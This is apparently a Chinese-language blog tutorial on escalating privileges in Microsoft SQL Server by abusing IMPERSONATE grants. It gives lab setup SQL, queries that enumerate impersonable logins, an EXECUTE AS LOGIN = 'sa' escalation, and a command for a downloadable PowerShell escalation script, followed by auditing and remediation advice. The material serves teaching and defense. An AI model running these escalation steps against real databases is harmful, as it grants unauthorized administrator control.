MSSQL模拟登录提权技术详解<\/h1>

0x01 技术原理<\/h2>

MSSQL的模拟登录(IMPERSONATE)功能允许低权限用户临时获取高权限用户的身份执行操作。这原本是SQL Server提供的一种合法功能，用于满足特定业务需求，但当配置不当时，攻击者可利用此功能进行权限提升。<\/p>

关键概念：<\/p>

IMPERSONATE<\/code>权限：允许一个用户模拟另一个用户的安全上下文<\/li>
EXECUTE AS<\/code>命令：实际执行模拟操作的T-SQL语句<\/li>

安全上下文切换：模拟期间，用户权限会临时切换到被模拟用户的权限级别<\/li>
<\/ul>
0x02 环境准备与复现步骤<\/h2>
1. 创建测试用户<\/h3>
使用sa账户执行以下SQL创建4个测试用户：<\/p>
-- Create login 1
<\/span><\/span><\/span><\/span>CREATE<\/span> LOGIN MyUser1 WITH<\/span> PASSWORD =<\/span> 'MyPassword!'<\/span>;
<\/span><\/span>-- Create login 2
<\/span><\/span><\/span><\/span>CREATE<\/span> LOGIN MyUser2 WITH<\/span> PASSWORD =<\/span> 'MyPassword!'<\/span>;
<\/span><\/span>-- Create login 3
<\/span><\/span><\/span><\/span>CREATE<\/span> LOGIN MyUser3 WITH<\/span> PASSWORD =<\/span> 'MyPassword!'<\/span>;
<\/span><\/span>-- Create login 4
<\/span><\/span><\/span><\/span>CREATE<\/span> LOGIN MyUser4 WITH<\/span> PASSWORD =<\/span> 'MyPassword!'<\/span>;
<\/span><\/span><\/code><\/pre>2. 配置模拟权限<\/h3>
授予MyUser1模拟sa、MyUser2和MyUser3的权限：<\/p>
USE master;
<\/span><\/span>GRANT<\/span> IMPERSONATE ON<\/span> LOGIN::sa to<\/span> [MyUser1];
<\/span><\/span>GRANT<\/span> IMPERSONATE ON<\/span> LOGIN::MyUser2 to<\/span> [MyUser1];
<\/span><\/span>GRANT<\/span> IMPERSONATE ON<\/span> LOGIN::MyUser3 to<\/span> [MyUser1];
<\/span><\/span>GO<\/span>
<\/span><\/span><\/code><\/pre>3. 查询可模拟的用户<\/h3>
使用MyUser1登录后，执行以下查询查看可模拟的用户：<\/p>
SELECT<\/span> distinct<\/span> b.name
<\/span><\/span>FROM<\/span> sys.server_permissions a
<\/span><\/span>INNER<\/span> JOIN<\/span> sys.server_principals b
<\/span><\/span>ON<\/span> a.grantor_principal_id =<\/span> b.principal_id
<\/span><\/span>WHERE<\/span> a.permission_name =<\/span> 'IMPERSONATE'<\/span>
<\/span><\/span><\/code><\/pre>4. 执行模拟提权<\/h3>
验证当前权限并模拟sa账户：<\/p>
-- 验证当前用户和权限
<\/span><\/span><\/span><\/span>SELECT<\/span> SYSTEM_USER<\/span>
<\/span><\/span>SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>)
<\/span><\/span>
<\/span><\/span>-- 模拟sa登录
<\/span><\/span><\/span><\/span>EXECUTE<\/span> AS<\/span> LOGIN =<\/span> 'sa'<\/span>
<\/span><\/span>
<\/span><\/span>-- 再次验证权限
<\/span><\/span><\/span><\/span>SELECT<\/span> SYSTEM_USER<\/span>
<\/span><\/span>SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>)
<\/span><\/span>
<\/span><\/span>-- 查看所有登录用户(权限提升后可见更多)
<\/span><\/span><\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> master.sys.sysusers WHERE<\/span> islogin =<\/span> 1<\/span>
<\/span><\/span><\/code><\/pre>5. 恢复原始会话<\/h3>
REVERT
<\/span><\/span>SELECT<\/span> SYSTEM_USER<\/span>
<\/span><\/span>SELECT<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>)
<\/span><\/span><\/code><\/pre>0x03 自动化工具<\/h2>
可使用PowerShell脚本自动化提权过程：<\/p>


下载脚本：<\/p>
https:\/\/raw.githubusercontent.com\/nullbind\/Powershellery\/master\/Stable-ish\/MSSQL\/Invoke-SqlServer-Escalate-ExecuteAs.psm1
<\/code><\/pre>
<\/li>

执行命令：<\/p>
Invoke-SqlServer-Escalate-ExecuteAs -SqlUser MyUser1 -SqlPass MyPassword! -SqlServerInstance WIN-80LVKKRM5UA
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 防御措施<\/h2>


权限最小化原则<\/strong>：<\/p>

严格限制IMPERSONATE权限的分配<\/li>
定期审计数据库中的模拟权限配置<\/li>
<\/ul>
<\/li>

监控与检测<\/strong>：<\/p>

监控EXECUTE AS命令的使用情况<\/li>
设置警报跟踪敏感账户的模拟行为<\/li>
<\/ul>
<\/li>

加固建议<\/strong>：<\/p>

使用以下SQL查询检测不当的模拟权限：
SELECT<\/span> p.name AS<\/span> Grantee, m.name AS<\/span> Grantor, p.type_desc AS<\/span> PrincipalType
<\/span><\/span>FROM<\/span> sys.server_permissions perm
<\/span><\/span>JOIN<\/span> sys.server_principals p ON<\/span> perm.grantee_principal_id =<\/span> p.principal_id
<\/span><\/span>JOIN<\/span> sys.server_principals m ON<\/span> perm.grantor_principal_id =<\/span> m.principal_id
<\/span><\/span>WHERE<\/span> perm.permission_name =<\/span> 'IMPERSONATE'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

补救措施<\/strong>：<\/p>

撤销不必要的模拟权限：
REVOKE<\/span> IMPERSONATE ON<\/span> LOGIN::sa FROM<\/span> [MyUser1];
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
0x05 技术总结<\/h2>

该技术不是漏洞而是功能滥用，依赖于配置不当<\/li>
攻击路径：低权限账户 → 获取模拟权限 → 模拟高权限账户 → 系统权限提升<\/li>
影响范围：所有配置了不当模拟权限的MSSQL服务器<\/li>
利用条件：攻击者需要先获得一个低权限的数据库账户<\/li>
<\/ol>
参考资源<\/h2>

Microsoft官方文档 - GRANT服务器主体权限<\/a><\/li>
SQL Server存储过程黑客技术第二部分：用户模拟<\/a><\/li>
SQL Server安全上下文和权限模拟<\/a><\/li>
<\/ol>

MSSQL模拟登录提权技术详解<\/h1>

0x02 环境准备与复现步骤<\/h2>

参考资源<\/h2> Microsoft官方文档 - GRANT服务器主体权限<\/a><\/li> SQL Server存储过程黑客技术第二部分：用户模拟<\/a><\/li> SQL Server安全上下文和权限模拟<\/a><\/li> <\/ol>

参考资源<\/h2>

Microsoft官方文档 - GRANT服务器主体权限<\/a><\/li>
SQL Server存储过程黑客技术第二部分：用户模拟<\/a><\/li>
SQL Server安全上下文和权限模拟<\/a><\/li> <\/ol>